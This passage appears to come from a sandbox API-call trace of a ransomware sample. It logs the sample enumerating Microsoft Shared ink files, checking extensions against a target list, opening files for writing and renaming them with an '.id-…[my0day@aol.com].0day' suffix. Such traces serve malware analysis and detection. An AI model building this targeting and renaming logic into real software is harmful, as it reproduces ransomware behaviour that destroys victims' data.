Shared\\ink\\en-US\\delete.avi") returned 67 [0266.348] lstrlenW (lpString=".jpg") returned 4 [0266.348] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0266.348] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi") returned 67 [0266.348] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi") returned 67 [0266.348] lstrlenW (lpString=".doc") returned 4 [0266.348] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0266.348] lstrlenW (lpString=".docx") returned 5 [0266.348] lstrcmpiW (lpString1=".docx", lpString2="e.avi") returned -1 [0266.348] lstrlenW (lpString=".pdf") returned 4 [0266.348] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0266.348] lstrlenW (lpString=".xls") returned 4 [0266.348] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0266.348] lstrlenW (lpString=".xlsx") returned 5 [0266.348] lstrcmpiW (lpString1=".xlsx", lpString2="e.avi") returned -1 [0266.348] lstrlenW (lpString=".ppt") returned 4 [0266.348] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0266.348] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi") returned 67 [0266.348] lstrlenW (lpString=".zip") returned 4 [0266.348] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0266.348] lstrlenW (lpString=".rar") returned 4 [0266.348] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0266.348] lstrlenW (lpString=".bz2") returned 4 [0266.348] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0266.348] lstrlenW (lpString=".7z") returned 3 [0266.348] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0266.348] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi") returned 67 [0266.348] lstrlenW (lpString=".dbf") returned 4 [0266.348] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0266.348] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi") returned 67 [0266.348] lstrlenW (lpString=".1cd") returned 4 [0266.348] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0266.348] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi") returned 67 [0266.348] lstrlenW (lpString=".jpg") returned 4 [0266.348] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0266.349] lstrcmpiW (lpString1=".avi", lpString2=".0day") returned 1 [0266.349] lstrlenW (lpString="join.avi") returned 8 [0266.349] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2cc [0266.349] GetFileSizeEx (in: hFile=0x2cc, lpFileSize=0x2aaff1c | out: lpFileSize=0x2aaff1c*=222208) returned 1 [0266.349] CloseHandle (hObject=0x2cc) returned 1 [0266.349] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi")) returned 0x20 [0266.349] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0266.349] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0266.349] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi") returned 65 [0266.349] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi") returned 65 [0266.349] lstrlenW (lpString=".doc") returned 4 [0266.349] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0266.349] lstrlenW (lpString=".docx") returned 5 [0266.349] lstrcmpiW (lpString1=".docx", lpString2="n.avi") returned -1 [0266.349] lstrlenW (lpString=".pdf") returned 4 [0266.349] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0266.349] lstrlenW (lpString=".xls") returned 4 [0266.349] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0266.349] lstrlenW (lpString=".xlsx") returned 5 [0266.349] lstrcmpiW (lpString1=".xlsx", lpString2="n.avi") returned -1 [0266.349] lstrlenW (lpString=".ppt") returned 4 [0266.349] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0266.349] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi") returned 65 [0266.349] lstrlenW (lpString=".zip") returned 4 [0266.350] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0266.350] lstrlenW (lpString=".rar") returned 4 [0266.350] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0266.350] lstrlenW (lpString=".bz2") returned 4 [0266.350] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0266.350] lstrlenW (lpString=".7z") returned 3 [0266.350] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0266.350] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi") returned 65 [0266.350] lstrlenW (lpString=".dbf") returned 4 [0266.350] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0266.350] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi") returned 65 [0266.350] lstrlenW (lpString=".1cd") returned 4 [0266.350] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0266.350] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi") returned 65 [0266.350] lstrlenW (lpString=".jpg") returned 4 [0266.350] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0266.350] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi") returned 65 [0266.350] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi") returned 65 [0266.350] lstrlenW (lpString=".doc") returned 4 [0266.350] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0266.350] lstrlenW (lpString=".docx") returned 5 [0266.350] lstrcmpiW (lpString1=".docx", lpString2="n.avi") returned -1 [0266.350] lstrlenW (lpString=".pdf") returned 4 [0266.350] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0266.350] lstrlenW (lpString=".xls") returned 4 [0266.350] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0266.350] lstrlenW (lpString=".xlsx") returned 5 [0266.350] lstrcmpiW (lpString1=".xlsx", lpString2="n.avi") returned -1 [0266.350] lstrlenW (lpString=".ppt") returned 4 [0266.350] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0266.350] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi") returned 65 [0266.350] lstrlenW (lpString=".zip") returned 4 [0266.350] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0266.350] lstrlenW (lpString=".rar") returned 4 [0266.350] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0266.350] lstrlenW (lpString=".bz2") returned 4 [0266.350] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0266.351] lstrlenW (lpString=".7z") returned 3 [0266.351] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0266.351] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi") returned 65 [0266.351] lstrlenW (lpString=".dbf") returned 4 [0266.351] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0266.351] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi") returned 65 [0266.351] lstrlenW (lpString=".1cd") returned 4 [0266.351] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0266.351] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi") returned 65 [0266.351] lstrlenW (lpString=".jpg") returned 4 [0266.351] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0266.351] lstrcmpiW (lpString1=".avi", lpString2=".0day") returned 1 [0266.351] lstrlenW (lpString="split.avi") returned 9 [0266.351] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\split.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2cc [0266.351] GetFileSizeEx (in: hFile=0x2cc, lpFileSize=0x2aaff1c | out: lpFileSize=0x2aaff1c*=194048) returned 1 [0266.351] CloseHandle (hObject=0x2cc) returned 1 [0266.351] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\split.avi")) returned 0x20 [0266.351] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\split.avi.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0266.351] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\split.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0266.351] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi") returned 66 [0266.351] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi") returned 66 [0266.351] lstrlenW (lpString=".doc") returned 4 [0266.351] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0266.351] lstrlenW (lpString=".docx") returned 5 [0266.352] lstrcmpiW (lpString1=".docx", lpString2="t.avi") returned -1 [0266.352] lstrlenW (lpString=".pdf") returned 4 [0266.352] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0266.352] lstrlenW (lpString=".xls") returned 4 [0266.352] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0266.352] lstrlenW (lpString=".xlsx") returned 5 [0266.352] lstrcmpiW (lpString1=".xlsx", lpString2="t.avi") returned -1 [0266.352] lstrlenW (lpString=".ppt") returned 4 [0266.352] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0266.352] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi") returned 66 [0266.352] lstrlenW (lpString=".zip") returned 4 [0266.352] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0266.352] lstrlenW (lpString=".rar") returned 4 [0266.352] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0266.352] lstrlenW (lpString=".bz2") returned 4 [0266.352] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0266.352] lstrlenW (lpString=".7z") returned 3 [0266.352] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0266.352] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi") returned 66 [0266.352] lstrlenW (lpString=".dbf") returned 4 [0266.352] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0266.352] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi") returned 66 [0266.352] lstrlenW (lpString=".1cd") returned 4 [0266.352] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0266.352] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi") returned 66 [0266.352] lstrlenW (lpString=".jpg") returned 4 [0266.352] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0266.352] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi") returned 66 [0266.352] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi") returned 66 [0266.352] lstrlenW (lpString=".doc") returned 4 [0266.352] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0266.352] lstrlenW (lpString=".docx") returned 5 [0266.352] lstrcmpiW (lpString1=".docx", lpString2="t.avi") returned -1 [0266.352] lstrlenW (lpString=".pdf") returned 4 [0266.352] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0266.352] lstrlenW (lpString=".xls") returned 4 [0266.352] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0266.353] lstrlenW (lpString=".xlsx") returned 5 [0266.353] lstrcmpiW (lpString1=".xlsx", lpString2="t.avi") returned -1 [0266.353] lstrlenW (lpString=".ppt") returned 4 [0266.353] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0266.353] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi") returned 66 [0266.353] lstrlenW (lpString=".zip") returned 4 [0266.353] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0266.353] lstrlenW (lpString=".rar") returned 4 [0266.353] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0266.353] lstrlenW (lpString=".bz2") returned 4 [0266.353] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0266.353] lstrlenW (lpString=".7z") returned 3 [0266.353] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0266.353] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi") returned 66 [0266.353] lstrlenW (lpString=".dbf") returned 4 [0266.353] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0266.353] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi") returned 66 [0266.353] lstrlenW (lpString=".1cd") returned 4 [0266.353] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0266.353] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi") returned 66 [0266.353] lstrlenW (lpString=".jpg") returned 4 [0266.353] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0266.353] lstrcmpiW (lpString1=".avi", lpString2=".0day") returned 1 [0266.353] lstrlenW (lpString="FlickAnimation.avi") returned 18 [0266.353] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2cc [0266.353] GetFileSizeEx (in: hFile=0x2cc, lpFileSize=0x2aaff1c | out: lpFileSize=0x2aaff1c*=1600388) returned 1 [0266.353] CloseHandle (hObject=0x2cc) returned 1 [0266.353] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi")) returned 0x20 [0266.354] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0266.354] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi.id-9c354b42.[my0day@aol.com].0day")) returned 0 [0266.354] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi") returned 69 [0266.354] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi") returned 69 [0266.354] lstrlenW (lpString=".doc") returned 4 [0266.354] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0266.354] lstrlenW (lpString=".docx") returned 5 [0266.354] lstrcmpiW (lpString1=".docx", lpString2="n.avi") returned -1 [0266.354] lstrlenW (lpString=".pdf") returned 4 [0266.354] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0266.354] lstrlenW (lpString=".xls") returned 4 [0266.354] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0266.354] lstrlenW (lpString=".xlsx") returned 5 [0266.354] lstrcmpiW (lpString1=".xlsx", lpString2="n.avi") returned -1 [0266.354] lstrlenW (lpString=".ppt") returned 4 [0266.354] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0266.354] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi") returned 69 [0266.354] lstrlenW (lpString=".zip") returned 4 [0266.354] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0266.354] lstrlenW (lpString=".rar") returned 4 [0266.354] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0266.354] lstrlenW (lpString=".bz2") returned 4 [0266.354] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0266.354] lstrlenW (lpString=".7z") returned 3 [0266.354] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0266.354] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi") returned 69 [0266.354] lstrlenW (lpString=".dbf") returned 4 [0266.354] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0266.354] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi") returned 69 [0266.354] lstrlenW (lpString=".1cd") returned 4 [0266.354] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0266.354] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi") returned 69 [0266.354] lstrlenW (lpString=".jpg") returned 4 [0266.354] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0266.355] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi") returned 69 [0266.355] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi") returned 69 [0266.355] lstrlenW (lpString=".doc") returned 4 [0266.355] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0266.355] lstrlenW (lpString=".docx") returned 5 [0266.355] lstrcmpiW (lpString1=".docx", lpString2="n.avi") returned -1 [0266.355] lstrlenW (lpString=".pdf") returned 4 [0266.355] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0266.355] lstrlenW (lpString=".xls") returned 4 [0266.355] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0266.355] lstrlenW (lpString=".xlsx") returned 5 [0266.355] lstrcmpiW (lpString1=".xlsx", lpString2="n.avi") returned -1 [0266.355] lstrlenW (lpString=".ppt") returned 4 [0266.355] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0266.355] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi") returned 69 [0266.355] lstrlenW (lpString=".zip") returned 4 [0266.355] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0266.355] lstrlenW (lpString=".rar") returned 4 [0266.355] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0266.355] lstrlenW (lpString=".bz2") returned 4 [0266.355] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0266.355] lstrlenW (lpString=".7z") returned 3 [0266.355] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0266.355] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi") returned 69 [0266.355] lstrlenW (lpString=".dbf") returned 4 [0266.355] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0266.355] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi") returned 69 [0266.355] lstrlenW (lpString=".1cd") returned 4 [0266.355] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0266.355] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi") returned 69 [0266.355] lstrlenW (lpString=".jpg") returned 4 [0266.355] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0266.356] lstrcmpiW (lpString1=".xml", lpString2=".0day") returned 1 [0266.356] lstrlenW (lpString="auxbase.xml") returned 11 [0266.356] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0266.492] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x2aaff1c | out: lpFileSize=0x2aaff1c*=1434) returned 1 [0266.492] CloseHandle (hObject=0x308) returned 1 [0266.492] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml")) returned 0x20 [0266.492] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0266.492] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0266.492] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83 [0266.492] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83 [0266.492] lstrlenW (lpString=".doc") returned 4 [0266.492] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0266.492] lstrlenW (lpString=".docx") returned 5 [0266.492] lstrcmpiW (lpString1=".docx", lpString2="e.xml") returned -1 [0266.492] lstrlenW (lpString=".pdf") returned 4 [0266.492] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0266.492] lstrlenW (lpString=".xls") returned 4 [0266.492] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0266.492] lstrlenW (lpString=".xlsx") returned 5 [0266.492] lstrcmpiW (lpString1=".xlsx", lpString2="e.xml") returned -1 [0266.492] lstrlenW (lpString=".ppt") returned 4 [0266.492] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0266.492] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83 [0266.492] lstrlenW (lpString=".zip") returned 4 [0266.492] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0266.492] lstrlenW (lpString=".rar") returned 4 [0266.493] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0266.493] lstrlenW (lpString=".bz2") returned 4 [0266.493] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0266.493] lstrlenW (lpString=".7z") returned 3 [0266.493] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0266.493] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83 [0266.493] lstrlenW (lpString=".dbf") returned 4 [0266.493] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0266.493] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83 [0266.493] lstrlenW (lpString=".1cd") returned 4 [0266.493] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0266.493] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83 [0266.493] lstrlenW (lpString=".jpg") returned 4 [0266.493] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0266.493] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83 [0266.493] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83 [0266.493] lstrlenW (lpString=".doc") returned 4 [0266.493] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0266.493] lstrlenW (lpString=".docx") returned 5 [0266.493] lstrcmpiW (lpString1=".docx", lpString2="e.xml") returned -1 [0266.493] lstrlenW (lpString=".pdf") returned 4 [0266.493] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0266.493] lstrlenW (lpString=".xls") returned 4 [0266.493] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0266.493] lstrlenW (lpString=".xlsx") returned 5 [0266.493] lstrcmpiW (lpString1=".xlsx", lpString2="e.xml") returned -1 [0266.493] lstrlenW (lpString=".ppt") returned 4 [0266.493] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0266.493] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83 [0266.493] lstrlenW (lpString=".zip") returned 4 [0266.493] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0266.493] lstrlenW (lpString=".rar") returned 4 [0266.493] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0266.493] lstrlenW (lpString=".bz2") returned 4 [0266.493] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0266.493] lstrlenW (lpString=".7z") returned 3 [0266.493] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0266.494] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83 [0266.494] lstrlenW (lpString=".dbf") returned 4 [0266.494] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0266.494] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83 [0266.494] lstrlenW (lpString=".1cd") returned 4 [0266.494] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0266.494] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83 [0266.494] lstrlenW (lpString=".jpg") returned 4 [0266.494] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0266.494] lstrcmpiW (lpString1=".xml", lpString2=".0day") returned 1 [0266.494] lstrlenW (lpString="keypad.xml") returned 10 [0266.494] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0266.754] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x2aaff1c | out: 